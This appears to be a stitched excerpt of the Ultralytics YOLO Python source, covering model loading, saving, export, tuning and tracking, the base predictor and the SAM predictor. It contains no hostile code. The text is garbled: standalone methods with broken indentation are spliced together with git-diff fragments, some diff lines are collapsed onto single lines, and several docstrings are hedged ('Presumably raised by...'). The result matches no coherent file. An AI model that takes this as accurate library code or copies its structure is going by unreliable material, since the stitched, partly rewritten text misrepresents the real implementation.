    # Build a new model from YAML, otherwise load existing weights
    if Path(source).suffix in {".yaml", ".yml"}:
        self._new(source, task=task, verbose=verbose)
    else:
        self._load(source, task=task)

    # Delete super().training for accessing self.model.training
    del self.training
@staticmethod
def is_triton_model(model: str) -> bool:
    """
    Checks if the given model string is a Triton Server URL.

    The string is parsed with urllib.parse.urlsplit(). It counts as a Triton Server URL only when it has a
    network location, a non-empty path and an 'http' or 'grpc' scheme.

    Args:
        model (str): The model string to be checked.

    Returns:
        (bool): True if the model string is a Triton Server URL, False otherwise.

    Examples:
        >>> Model.is_triton_model("http://localhost:8000/v2/models/yolov8n")
        True
        >>> Model.is_triton_model("yolo11n.pt")
        False
    """
    from urllib.parse import urlsplit

    url = urlsplit(model)
    # bool() is required: a bare `and` chain returns the first falsy operand, i.e. '' instead of False
    # for plain file names, which contradicts the declared return type.
    return bool(url.netloc and url.path and url.scheme in {"http", "grpc"})
def _load(self, weights: str, task=None) -> None:
    """
    Populates the model from a weights file, handling both *.pt checkpoints and other formats.

    Remote sources (https/http/rtsp/rtmp/tcp) are first resolved to a local file via `checks.check_file`, and
    the name is passed through `checks.check_model_file_from_stem`. For '.pt' files the checkpoint is loaded and
    task, overrides and checkpoint path are taken from the loaded model. For any other suffix the path itself is
    stored as the model and the task is taken from `task` or guessed from the file.

    Args:
        weights (str): Path, name or URL of the model weights to load.
        task (str | None): The task associated with the model. Only used for non-'.pt' weights; if None it is
            guessed with `guess_model_task`.

    Examples:
        >>> model = Model()
        >>> model._load("yolo11n.pt")
        >>> model._load("path/to/weights.onnx", task="detect")
    """
    remote_prefixes = ("https://", "http://", "rtsp://", "rtmp://", "tcp://")
    if weights.lower().startswith(remote_prefixes):
        # download and return local file
        weights = checks.check_file(weights, download_dir=SETTINGS["weights_dir"])
    weights = checks.check_model_file_from_stem(weights)  # add suffix, i.e. yolov8n -> yolov8n.pt

    if Path(weights).suffix != ".pt":
        # Non-PyTorch format: keep the file path as the "model", there is no checkpoint dict
        weights = checks.check_file(weights)  # runs in all cases, not redundant with above call
        self.model = weights
        self.ckpt = None
        self.task = task or guess_model_task(weights)
        self.ckpt_path = weights
    else:
        # PyTorch checkpoint: task and args come from the checkpoint itself
        self.model, self.ckpt = attempt_load_one_weight(weights)
        self.task = self.model.args["task"]
        ckpt_args = self._reset_ckpt_args(self.model.args)
        self.overrides = ckpt_args
        self.model.args = ckpt_args  # same dict object as self.overrides
        self.ckpt_path = self.model.pt_path

    self.overrides["model"] = weights
    self.overrides["task"] = self.task
    self.model_name = weights
def reset_weights(self) -> "Model":
    """
    Re-initialises the model's parameters and makes all of them trainable.

    Every sub-module that exposes a 'reset_parameters' method has it called, after which 'requires_grad' is set
    to True on every parameter of the model.

    Returns:
        (Model): The same instance, to allow call chaining.

    Raises:
        TypeError: If the model is not a PyTorch model (raised by `_check_is_pytorch_model`).

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model.reset_weights()
    """
    self._check_is_pytorch_model()

    # Only some layer types define reset_parameters; skip the rest
    for layer in self.model.modules():
        if not hasattr(layer, "reset_parameters"):
            continue
        layer.reset_parameters()

    # Unfreeze everything so the re-initialised weights can be trained
    for param in self.model.parameters():
        param.requires_grad = True

    return self
def save(self, filename: Union[str, Path] = "saved_model.pt") -> None:
    """
    Saves the current model state to a file.

    The saved dictionary is the loaded checkpoint (if any) updated with a half-precision deep copy of the
    model, the current date, the Ultralytics version, license information and a link to the documentation.

    Args:
        filename (Union[str, Path]): The name of the file to save the model to.

    Raises:
        TypeError: If the model is not a PyTorch model (raised by `_check_is_pytorch_model`).

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model.save("my_model.pt")
    """
    self._check_is_pytorch_model()
    from copy import deepcopy
    from datetime import datetime

    from ultralytics import __version__

    updates = {
        # deep copy so that converting to FP16 for storage does not touch the live model
        "model": deepcopy(self.model).half() if isinstance(self.model, nn.Module) else self.model,
        "date": datetime.now().isoformat(),
        "version": __version__,
        "license": "AGPL-3.0 License (https://ultralytics.com/license)",
        "docs": "https://docs.ultralytics.com",
    }
    # self.ckpt stays None for models built from a YAML config (never loaded from *.pt); unpacking None
    # with ** would raise TypeError, so fall back to an empty checkpoint.
    torch.save({**(self.ckpt or {}), **updates}, filename)
def embed(
    self,
    source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None,
    stream: bool = False,
    **kwargs,
) -> list:
    """
    Generates image embeddings for the given source by delegating to `predict()`.

    If the caller passes no (or an empty) 'embed' keyword argument, the index of the second-to-last layer of the
    model is used. All other keyword arguments are forwarded to `predict()` untouched.

    Args:
        source (str | Path | int | List | Tuple | np.ndarray | torch.Tensor): The source of the image for
            generating embeddings.
        stream (bool): Forwarded to `predict()`; if True, predictions are streamed.
        **kwargs (Any): Additional keyword arguments for `predict()`. 'embed' may hold the layer indices to
            take embeddings from.

    Returns:
        (list): Whatever `predict()` returns for the given arguments (the image embeddings).

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> image = "https://ultralytics.com/images/bus.jpg"
        >>> embeddings = model.embed(image)
        >>> print(embeddings[0].shape)
    """
    # embed second-to-last layer if no indices passed
    kwargs["embed"] = kwargs.get("embed") or [len(self.model.model) - 2]
    return self.predict(source, stream, **kwargs)
def track(
    self,
    source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None,
    stream: bool = False,
    persist: bool = False,
    **kwargs,
) -> List[Results]:
    """
    Runs object tracking on the given source by delegating to `predict()` in 'track' mode.

    If the current predictor has no 'trackers' attribute, trackers are registered on this model first. The
    keyword arguments are then completed with tracking defaults before being forwarded to `predict()`.

    Args:
        source (Union[str, Path, int, List, Tuple, np.ndarray, torch.Tensor], optional): Input source for object
            tracking.
        stream (bool): Forwarded to `predict()`; if True, treats the source as a continuous stream.
        persist (bool): Passed to `register_tracker` when trackers are registered.
        **kwargs (Any): Additional keyword arguments for `predict()`.

    Returns:
        (List[ultralytics.engine.results.Results]): The results returned by `predict()`.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> results = model.track(source="path/to/video.mp4", show=True)
        >>> for r in results:
        ...     print(r.boxes.id)  # print tracking IDs

    Notes:
        - 'conf' falls back to 0.1 and 'batch' to 1 whenever the passed value is missing or falsy.
        - 'mode' is always overwritten with 'track'.
    """
    trackers_registered = hasattr(self.predictor, "trackers")
    if not trackers_registered:
        from ultralytics.trackers import register_tracker

        register_tracker(self, persist)

    kwargs.update(
        conf=kwargs.get("conf") or 0.1,  # ByteTrack-based method needs low confidence predictions as input
        batch=kwargs.get("batch") or 1,  # batch-size 1 for tracking in videos
        mode="track",
    )
    return self.predict(source=source, stream=stream, **kwargs)
def export(self, **kwargs) -> str:
    """
    Export the model through the `Exporter` class and return whatever the exporter call returns.

    The exporter configuration is layered, later layers replacing clashing keys from earlier ones: the model's
    stored overrides, the method defaults listed below, the caller's keyword arguments, and finally a forced
    mode of "export".

    Method defaults:
        imgsz: taken from `self.model.args["imgsz"]`.
        batch: 1.
        data: None.
        device: None (reset to avoid multi-GPU errors).
        verbose: False.

    Args:
        **kwargs (Any): Export settings that override the model overrides and the method defaults, for example
            `format`, `half`, `int8`, `device`, `workspace`, `nms` or `simplify`.

    Returns:
        (str): The value returned by calling the configured exporter on `self.model`, annotated as the path to
            the exported model.

    Raises:
        AssertionError: Presumably raised by `_check_is_pytorch_model` when the model is not a PyTorch model;
            that check is defined outside this block.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> model.export(format="onnx", dynamic=True, simplify=True)
        'path/to/exported/model.onnx'
    """
    self._check_is_pytorch_model()
    from .exporter import Exporter

    # Lowest priority first; each update may replace keys set by the previous layer.
    export_args = dict(self.overrides)
    export_args.update(
        imgsz=self.model.args["imgsz"],
        batch=1,
        data=None,
        device=None,  # reset to avoid multi-GPU errors
        verbose=False,
    )
    export_args.update(kwargs)
    export_args["mode"] = "export"

    exporter = Exporter(overrides=export_args, _callbacks=self.callbacks)
    return exporter(model=self.model)
The method handles scenarios such as resuming training + from a checkpoint, integrating with Ultralytics HUB, and updating model and configuration after training. + + When using Ultralytics HUB, if the session has a loaded model, the method prioritizes HUB training + arguments and warns if local arguments are provided. It checks for pip updates and combines default + configurations, method-specific defaults, and user-provided arguments to configure the training process. + + Args: + trainer (BaseTrainer | None): Custom trainer instance for model training. If None, uses default. + **kwargs (Any): Arbitrary keyword arguments for training configuration. Common options include: + data (str): Path to dataset configuration file. + epochs (int): Number of training epochs. + batch_size (int): Batch size for training. + imgsz (int): Input image size. + device (str): Device to run training on (e.g., 'cuda', 'cpu'). + workers (int): Number of worker threads for data loading. + optimizer (str): Optimizer to use for training. + lr0 (float): Initial learning rate. + patience (int): Epochs to wait for no observable improvement for early stopping of training. + + Returns: + (Dict | None): Training metrics if available and training is successful; otherwise, None. + + Raises: + AssertionError: If the model is not a PyTorch model. + PermissionError: If there is a permission issue with the HUB session. + ModuleNotFoundError: If the HUB SDK is not installed. 
def tune(self, use_ray=False, iterations=10, *args, **kwargs):
    """
    Run a hyperparameter search for the model, either with Ray Tune or with the built-in `Tuner`.

    With `use_ray=True` the work is delegated to `run_ray_tune`, receiving this model, any extra positional
    arguments, `max_samples=iterations` and the keyword arguments. Otherwise a `Tuner` is configured from the
    model's overrides updated with the keyword arguments, with the mode forced to "train", and is called with this
    model and the iteration count.

    Args:
        use_ray (bool): If True, uses Ray Tune for hyperparameter tuning. Defaults to False.
        iterations (int): Number of tuning iterations (passed as `max_samples` to Ray Tune). Defaults to 10.
        *args (Any): Extra positional arguments. They are forwarded only on the Ray Tune path; the built-in
            tuner path does not use them.
        **kwargs (Any): Keyword arguments forwarded to Ray Tune, or merged over the model's overrides for the
            built-in tuner.

    Returns:
        (Any): The result of `run_ray_tune(...)` or of calling the configured `Tuner`.

    Raises:
        AssertionError: Presumably raised by `_check_is_pytorch_model` when the model is not a PyTorch model;
            that check is defined outside this block.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> results = model.tune(use_ray=True, iterations=20)
        >>> print(results)
    """
    self._check_is_pytorch_model()

    if not use_ray:
        from .tuner import Tuner

        # Model overrides first, caller kwargs on top, mode always "train".
        tuner_args = dict(self.overrides)
        tuner_args.update(kwargs)
        tuner_args["mode"] = "train"
        tuner = Tuner(args=tuner_args, _callbacks=self.callbacks)
        return tuner(model=self, iterations=iterations)

    from ultralytics.utils.tuner import run_ray_tune

    return run_ray_tune(self, *args, max_samples=iterations, **kwargs)
@property
def device(self) -> "torch.device | None":
    """
    Retrieves the device on which the model's parameters are allocated.

    The device is read from the first parameter yielded by `self.model.parameters()`. It is only available when
    `self.model` is an `nn.Module` that owns at least one parameter; in every other case None is returned instead
    of raising, so callers such as `_apply` can store the value without special-casing parameter-free modules.

    Returns:
        (torch.device | None): The device of the model's first parameter, or None when the model is not an
            `nn.Module` (for example an exported-format model) or has no parameters.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> print(model.device)
        device(type='cuda', index=0)  # if CUDA is available
        >>> model = model.to("cpu")
        >>> print(model.device)
        device(type='cpu')
    """
    if not isinstance(self.model, nn.Module):
        return None
    # A default for next() avoids leaking StopIteration out of the property for modules without parameters.
    first_param = next(self.model.parameters(), None)
    return None if first_param is None else first_param.device
def clear_callback(self, event: str) -> None:
    """
    Remove every callback registered for one event.

    The entry for `event` in `self.callbacks` is replaced by a new empty list, so nothing registered for that
    event before the call remains, and the event gains an empty entry if it had none.

    Args:
        event (str): Name of the event whose callbacks should be cleared.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> model.add_callback("on_train_start", lambda: print("Training started"))
        >>> model.clear_callback("on_train_start")
        >>> # All callbacks for 'on_train_start' are now removed

    Notes:
        - Every callback stored under the event is dropped, whoever registered it.
        - Callbacks registered for other events are left untouched.
    """
    registry = self.callbacks
    registry[event] = []
@staticmethod
def _reset_ckpt_args(args: dict) -> dict:
    """
    Keep only the checkpoint arguments that should be remembered when loading a PyTorch model.

    A new dictionary is built from the entries of `args` whose key is one of "imgsz", "data", "task" or
    "single_cls"; every other entry is dropped. The input dictionary is not modified and the relative order of
    the retained keys is preserved.

    Args:
        args (dict): Model arguments and settings, typically read from a checkpoint.

    Returns:
        (dict): A new dictionary restricted to the retained keys that were present in `args`.

    Examples:
        >>> original_args = {"imgsz": 640, "data": "coco.yaml", "task": "detect", "batch": 16, "epochs": 100}
        >>> reset_args = Model._reset_ckpt_args(original_args)
        >>> print(reset_args)
        {'imgsz': 640, 'data': 'coco.yaml', 'task': 'detect'}
    """
    remembered = ("imgsz", "data", "task", "single_cls")  # only remember these arguments
    retained = {}
    for key, value in args.items():
        if key in remembered:
            retained[key] = value
    return retained
+ + This method dynamically selects and returns the correct module (model, trainer, validator, or predictor) + based on the current task of the model and the provided key. It uses the task_map attribute to determine + the correct module to load. + + Args: + key (str): The type of module to load. Must be one of 'model', 'trainer', 'validator', or 'predictor'. + + Returns: + (object): The loaded module corresponding to the specified key and current task. + + Raises: + NotImplementedError: If the specified key is not supported for the current task. + + Examples: + >>> model = Model(task="detect") + >>> predictor = model._smart_load("predictor") + >>> trainer = model._smart_load("trainer") + + Notes: + - This method is typically used internally by other methods of the Model class. + - The task_map attribute should be properly initialized with the correct mappings for each task. + """ + try: + return self.task_map[self.task][key] + except Exception as e: + name = self.__class__.__name__ + mode = inspect.stack()[1][3] # get the function name. + raise NotImplementedError( + emojis(f"WARNING ⚠️ '{name}' model does not support '{mode}' mode for '{self.task}' task yet.") + ) from e + + @property + def task_map(self) -> dict: + """ + Provides a mapping from model tasks to corresponding classes for different modes. + + This property method returns a dictionary that maps each supported task (e.g., detect, segment, classify) + to a nested dictionary. The nested dictionary contains mappings for different operational modes + (model, trainer, validator, predictor) to their respective class implementations. + + The mapping allows for dynamic loading of appropriate classes based on the model's task and the + desired operational mode. This facilitates a flexible and extensible architecture for handling + various tasks and modes within the Ultralytics framework. 
def eval(self):
    """
    Switch the wrapped model to evaluation mode.

    The call is forwarded to `self.model.eval()`; this wrapper itself is returned so that calls can be chained.

    Returns:
        (Model): This instance, after its underlying model has been put into evaluation mode.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> model.eval()
    """
    wrapped = self.model
    wrapped.eval()
    return self
+ + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.stride) + >>> print(model.task) + """ + if name == "model": + return self._modules["model"] + return getattr(self.model, name) diff --git a/2024.ultralytics/v8.3.44/engine/predictor.py b/2024.ultralytics/v8.3.44/engine/predictor.py new file mode 100644 index 0000000..c525016 --- /dev/null +++ b/2024.ultralytics/v8.3.44/engine/predictor.py @@ -0,0 +1,408 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license +""" +Run prediction on images, videos, directories, globs, YouTube, webcam, streams, etc. + +Usage - sources: + $ yolo mode=predict model=yolov8n.pt source=0 # webcam + img.jpg # image + vid.mp4 # video + screen # screenshot + path/ # directory + list.txt # list of images + list.streams # list of streams + 'path/*.jpg' # glob + 'https://youtu.be/LNwODJXcvt4' # YouTube + 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP, TCP stream + +Usage - formats: + $ yolo mode=predict model=yolov8n.pt # PyTorch + yolov8n.torchscript # TorchScript + yolov8n.onnx # ONNX Runtime or OpenCV DNN with dnn=True + yolov8n_openvino_model # OpenVINO + yolov8n.engine # TensorRT + yolov8n.mlpackage # CoreML (macOS-only) + yolov8n_saved_model # TensorFlow SavedModel + yolov8n.pb # TensorFlow GraphDef + yolov8n.tflite # TensorFlow Lite + yolov8n_edgetpu.tflite # TensorFlow Edge TPU + yolov8n_paddle_model # PaddlePaddle + yolov8n.mnn # MNN + yolov8n_ncnn_model # NCNN +""" + +import platform +import re +import threading +from pathlib import Path + +import cv2 +import numpy as np +import torch + +from ultralytics.cfg import get_cfg, get_save_dir +from ultralytics.data import load_inference_source +from ultralytics.data.augment import LetterBox, classify_transforms +from ultralytics.nn.autobackend import AutoBackend +from ultralytics.utils import DEFAULT_CFG, LOGGER, MACOS, WINDOWS, callbacks, colorstr, ops +from ultralytics.utils.checks import check_imgsz, check_imshow +from ultralytics.utils.files import increment_path +from 
ultralytics.utils.torch_utils import select_device, smart_inference_mode + +STREAM_WARNING = """ +WARNING ⚠️ inference results will accumulate in RAM unless `stream=True` is passed, causing potential out-of-memory +errors for large sources or long-running streams and videos. See https://docs.ultralytics.com/modes/predict/ for help. + +Example: + results = model(source=..., stream=True) # generator of Results objects + for r in results: + boxes = r.boxes # Boxes object for bbox outputs + masks = r.masks # Masks object for segment masks outputs + probs = r.probs # Class probabilities for classification outputs +""" + + +class BasePredictor: + """ + BasePredictor. + + A base class for creating predictors. + + Attributes: + args (SimpleNamespace): Configuration for the predictor. + save_dir (Path): Directory to save results. + done_warmup (bool): Whether the predictor has finished setup. + model (nn.Module): Model used for prediction. + data (dict): Data configuration. + device (torch.device): Device used for prediction. + dataset (Dataset): Dataset used for prediction. + vid_writer (dict): Dictionary of {save_path: video_writer, ...} writer for saving video output. + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initializes the BasePredictor class. + + Args: + cfg (str, optional): Path to a configuration file. Defaults to DEFAULT_CFG. + overrides (dict, optional): Configuration overrides. Defaults to None. 
def preprocess(self, im):
    """
    Convert an input batch into a floating-point tensor on the predictor's device.

    Non-tensor input is passed through `self.pre_transform`, stacked into one array, has its last axis reversed
    (BGR to RGB), is rearranged from BHWC to BCHW and is scaled from 0-255 to 0.0-1.0. Tensor input is only moved
    to the device and cast; it is not rescaled here.

    Args:
        im (torch.Tensor | List(np.ndarray)): BCHW for tensor, [(HWC) x B] for list.

    Returns:
        (torch.Tensor): The batch on `self.device`, in half precision when `self.model.fp16` is truthy and in
            single precision otherwise.
    """
    from_arrays = not isinstance(im, torch.Tensor)
    if from_arrays:
        stacked = np.stack(self.pre_transform(im))
        rgb_bchw = stacked[..., ::-1].transpose((0, 3, 1, 2))  # BGR to RGB, BHWC to BCHW, (n, 3, h, w)
        im = torch.from_numpy(np.ascontiguousarray(rgb_bchw))  # contiguous copy, negative strides removed

    im = im.to(self.device)
    if self.model.fp16:
        im = im.half()  # uint8 to fp16
    else:
        im = im.float()  # uint8 to fp32
    if from_arrays:
        im /= 255  # 0 - 255 to 0.0 - 1.0
    return im
def __call__(self, source=None, model=None, stream=False, *args, **kwargs):
    """
    Run inference on a source, either lazily or eagerly.

    The `stream` flag is recorded on the instance, then `stream_inference` is invoked with the remaining
    arguments. Its result is handed back untouched when streaming, or consumed into a list otherwise.

    Args:
        source (Any): Input forwarded to `stream_inference`.
        model (Any): Model argument forwarded to `stream_inference`.
        stream (bool): If truthy, return the object produced by `stream_inference` as is; otherwise return a
            list of everything it yields.
        *args (Any): Extra positional arguments forwarded to `stream_inference`.
        **kwargs (Any): Extra keyword arguments forwarded to `stream_inference`.

    Returns:
        (Iterable | list): The streaming result, or a list of all results merged from it.
    """
    self.stream = stream
    results = self.stream_inference(source, model, *args, **kwargs)
    return results if stream else list(results)  # merge list of Result into one
def setup_source(self, source):
    """
    Prepare the image size, optional classification transforms and dataset for one inference call.

    The configured image size is validated against the model stride, the inference dataset is created from
    `source`, and the video-writer registry is reset. For the "classify" task the transforms are read from
    `self.model.model.transforms`, falling back to `classify_transforms`; for every other task they are None.
    When streaming was explicitly disabled and the source is a stream, a screenshot, more than 1000 items or
    contains videos, `STREAM_WARNING` is logged.

    Args:
        source (Any): Input source forwarded to `load_inference_source`.
    """
    self.imgsz = check_imgsz(self.args.imgsz, stride=self.model.stride, min_dim=2)  # check image size

    if self.args.task == "classify":
        self.transforms = getattr(
            self.model.model,
            "transforms",
            classify_transforms(self.imgsz[0], crop_fraction=self.args.crop_fraction),
        )
    else:
        self.transforms = None

    self.dataset = load_inference_source(
        source=source,
        batch=self.args.batch,
        vid_stride=self.args.vid_stride,
        buffer=self.args.stream_buffer,
    )
    self.source_type = self.dataset.source_type

    # A missing `stream` attribute is treated as streaming, which suppresses the warning.
    if not getattr(self, "stream", True):
        kind = self.source_type
        accumulates = (
            kind.stream
            or kind.screenshot
            or len(self.dataset) > 1000  # many images
            or any(getattr(self.dataset, "video_flag", [False]))  # videos
        )
        if accumulates:
            LOGGER.warning(STREAM_WARNING)

    self.vid_writer = {}
self.run_callbacks("on_predict_start") + for self.batch in self.dataset: + self.run_callbacks("on_predict_batch_start") + paths, im0s, s = self.batch + + # Preprocess + with profilers[0]: + im = self.preprocess(im0s) + + # Inference + with profilers[1]: + preds = self.inference(im, *args, **kwargs) + if self.args.embed: + yield from [preds] if isinstance(preds, torch.Tensor) else preds # yield embedding tensors + continue + + # Postprocess + with profilers[2]: + self.results = self.postprocess(preds, im, im0s) + self.run_callbacks("on_predict_postprocess_end") + + # Visualize, save, write results + n = len(im0s) + for i in range(n): + self.seen += 1 + self.results[i].speed = { + "preprocess": profilers[0].dt * 1e3 / n, + "inference": profilers[1].dt * 1e3 / n, + "postprocess": profilers[2].dt * 1e3 / n, + } + if self.args.verbose or self.args.save or self.args.save_txt or self.args.show: + s[i] += self.write_results(i, Path(paths[i]), im, s) + + # Print batch results + if self.args.verbose: + LOGGER.info("\n".join(s)) + + self.run_callbacks("on_predict_batch_end") + yield from self.results + + # Release assets + for v in self.vid_writer.values(): + if isinstance(v, cv2.VideoWriter): + v.release() + + # Print final results + if self.args.verbose and self.seen: + t = tuple(x.t / self.seen * 1e3 for x in profilers) # speeds per image + LOGGER.info( + f"Speed: %.1fms preprocess, %.1fms inference, %.1fms postprocess per image at shape " + f"{(min(self.args.batch, self.seen), 3, *im.shape[2:])}" % t + ) + if self.args.save or self.args.save_txt or self.args.save_crop: + nl = len(list(self.save_dir.glob("labels/*.txt"))) # number of labels + s = f"\n{nl} label{'s' * (nl > 1)} saved to {self.save_dir / 'labels'}" if self.args.save_txt else "" + LOGGER.info(f"Results saved to {colorstr('bold', self.save_dir)}{s}") + self.run_callbacks("on_predict_end") + + def setup_model(self, model, verbose=True): + """Initialize YOLO model with given parameters and set it to evaluation 
def save_predicted_images(self, save_path="", frame=0):
    """
    Write the most recently plotted image to disk as a video frame or as a still image.

    For datasets in "stream" or "video" mode the image is appended to a `cv2.VideoWriter` that is created on first
    use and cached in `self.vid_writer` under `save_path`. When `self.args.save_frames` is set, each frame is also
    written as a JPG into a sibling directory named after the output file without its extension plus "_frames".
    For every other mode the image is written once as a JPG next to `save_path`.

    Args:
        save_path (str): Destination path of the output; its extension is replaced by the container or image
            suffix actually used.
        frame (int | None): Frame index used to name individual frame images when frames are saved.
    """
    im = self.plotted_img

    # Save videos and streams
    if self.dataset.mode in {"stream", "video"}:
        fps = self.dataset.fps if self.dataset.mode == "video" else 30

        frames_dir = None
        if self.args.save_frames:
            # Strip only the file's own extension. Splitting the whole path at its first "." would cut it at a
            # dotted parent directory, a leading "./", or the first dot of a multi-dot file name.
            stem_path = Path(save_path).with_suffix("")
            frames_dir = stem_path.with_name(f"{stem_path.name}_frames")

        if save_path not in self.vid_writer:  # new video
            if frames_dir is not None:
                frames_dir.mkdir(parents=True, exist_ok=True)
            suffix, fourcc = (".mp4", "avc1") if MACOS else (".avi", "WMV2") if WINDOWS else (".avi", "MJPG")
            self.vid_writer[save_path] = cv2.VideoWriter(
                filename=str(Path(save_path).with_suffix(suffix)),
                fourcc=cv2.VideoWriter_fourcc(*fourcc),
                fps=fps,  # integer required, floats produce error in MP4 codec
                frameSize=(im.shape[1], im.shape[0]),  # (width, height)
            )

        # Save video
        self.vid_writer[save_path].write(im)
        if frames_dir is not None:
            cv2.imwrite(str(frames_dir / f"{frame}.jpg"), im)

    # Save images
    else:
        cv2.imwrite(str(Path(save_path).with_suffix(".jpg")), im)  # save to JPG for best support
+ +SAM is an advanced image segmentation model offering features like promptable segmentation and zero-shot performance. +This module contains the implementation of the prediction logic and auxiliary utilities required to perform segmentation +using SAM. It forms an integral part of the Ultralytics framework and is designed for high-performance, real-time image +segmentation tasks. +""" + +from collections import OrderedDict + +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.data.augment import LetterBox +from ultralytics.engine.predictor import BasePredictor +from ultralytics.engine.results import Results +from ultralytics.utils import DEFAULT_CFG, ops +from ultralytics.utils.torch_utils import select_device, smart_inference_mode + +from .amg import ( + batch_iterator, + batched_mask_to_box, + build_all_layer_point_grids, + calculate_stability_score, + generate_crop_boxes, + is_box_near_crop_edge, + remove_small_regions, + uncrop_boxes_xyxy, + uncrop_masks, +) +from .build import build_sam + + +class Predictor(BasePredictor): + """ + Predictor class for SAM, enabling real-time image segmentation with promptable capabilities. + + This class extends BasePredictor and implements the Segment Anything Model (SAM) for advanced image + segmentation tasks. It supports various input prompts like points, bounding boxes, and masks for + fine-grained control over segmentation results. + + Attributes: + args (SimpleNamespace): Configuration arguments for the predictor. + model (torch.nn.Module): The loaded SAM model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + im (torch.Tensor): The preprocessed input image. + features (torch.Tensor): Extracted image features. + prompts (Dict): Dictionary to store various types of prompts (e.g., bboxes, points, masks). + segment_all (bool): Flag to indicate if full image segmentation should be performed. + mean (torch.Tensor): Mean values for image normalization. 
+ std (torch.Tensor): Standard deviation values for image normalization. + + Methods: + preprocess: Prepares input images for model inference. + pre_transform: Performs initial transformations on the input image. + inference: Performs segmentation inference based on input prompts. + prompt_inference: Internal function for prompt-based segmentation inference. + generate: Generates segmentation masks for an entire image. + setup_model: Initializes the SAM model for inference. + get_model: Builds and returns a SAM model. + postprocess: Post-processes model outputs to generate final results. + setup_source: Sets up the data source for inference. + set_image: Sets and preprocesses a single image for inference. + get_im_features: Extracts image features using the SAM image encoder. + set_prompts: Sets prompts for subsequent inference. + reset_image: Resets the current image and its features. + remove_small_regions: Removes small disconnected regions and holes from masks. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, boxes = predictor.generate() + >>> results = predictor.postprocess((masks, scores, boxes), im, orig_img) + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the Predictor with configuration, overrides, and callbacks. + + Sets up the Predictor object for SAM (Segment Anything Model) and applies any configuration overrides or + callbacks provided. Initializes task-specific settings for SAM, such as retina_masks being set to True + for optimal results. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior. 
+ + Examples: + >>> predictor = Predictor(cfg=DEFAULT_CFG) + >>> predictor = Predictor(overrides={"imgsz": 640}) + >>> predictor = Predictor(_callbacks={"on_predict_start": custom_callback}) + """ + if overrides is None: + overrides = {} + overrides.update(dict(task="segment", mode="predict", batch=1)) + super().__init__(cfg, overrides, _callbacks) + self.args.retina_masks = True + self.im = None + self.features = None + self.prompts = {} + self.segment_all = False + + def preprocess(self, im): + """ + Preprocess the input image for model inference. + + This method prepares the input image by applying transformations and normalization. It supports both + torch.Tensor and list of np.ndarray as input formats. + + Args: + im (torch.Tensor | List[np.ndarray]): Input image(s) in BCHW tensor format or list of HWC numpy arrays. + + Returns: + im (torch.Tensor): The preprocessed image tensor, normalized and converted to the appropriate dtype. + + Examples: + >>> predictor = Predictor() + >>> image = torch.rand(1, 3, 640, 640) + >>> preprocessed_image = predictor.preprocess(image) + """ + if self.im is not None: + return self.im + not_tensor = not isinstance(im, torch.Tensor) + if not_tensor: + im = np.stack(self.pre_transform(im)) + im = im[..., ::-1].transpose((0, 3, 1, 2)) + im = np.ascontiguousarray(im) + im = torch.from_numpy(im) + + im = im.to(self.device) + im = im.half() if self.model.fp16 else im.float() + if not_tensor: + im = (im - self.mean) / self.std + return im + + def pre_transform(self, im): + """ + Perform initial transformations on the input image for preprocessing. + + This method applies transformations such as resizing to prepare the image for further preprocessing. + Currently, batched inference is not supported; hence the list length should be 1. + + Args: + im (List[np.ndarray]): List containing a single image in HWC numpy array format. + + Returns: + (List[np.ndarray]): List containing the transformed image. 
+ + Raises: + AssertionError: If the input list contains more than one image. + + Examples: + >>> predictor = Predictor() + >>> image = np.random.rand(480, 640, 3) # Single HWC image + >>> transformed = predictor.pre_transform([image]) + >>> print(len(transformed)) + 1 + """ + assert len(im) == 1, "SAM model does not currently support batched inference" + letterbox = LetterBox(self.args.imgsz, auto=False, center=False) + return [letterbox(image=x) for x in im] + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False, *args, **kwargs): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. + + This method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt + encoder, and mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List | None): Labels for point prompts, shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions, shape (N, H, W). For SAM H=W=256. + multimask_output (bool): Flag to return multiple masks. Helpful for ambiguous prompts. + *args (Any): Additional positional arguments. + **kwargs (Any): Additional keyword arguments. + + Returns: + (torch.Tensor): The output masks in shape (C, H, W), where C is the number of generated masks. + (torch.Tensor): A tensor of length C containing quality scores predicted by the model for each mask. + (torch.Tensor): Bounding boxes with shape (C, 4), returned only when no bboxes, points or masks prompt is + given and the whole image is segmented via `generate`; prompt-based calls return only the first two.
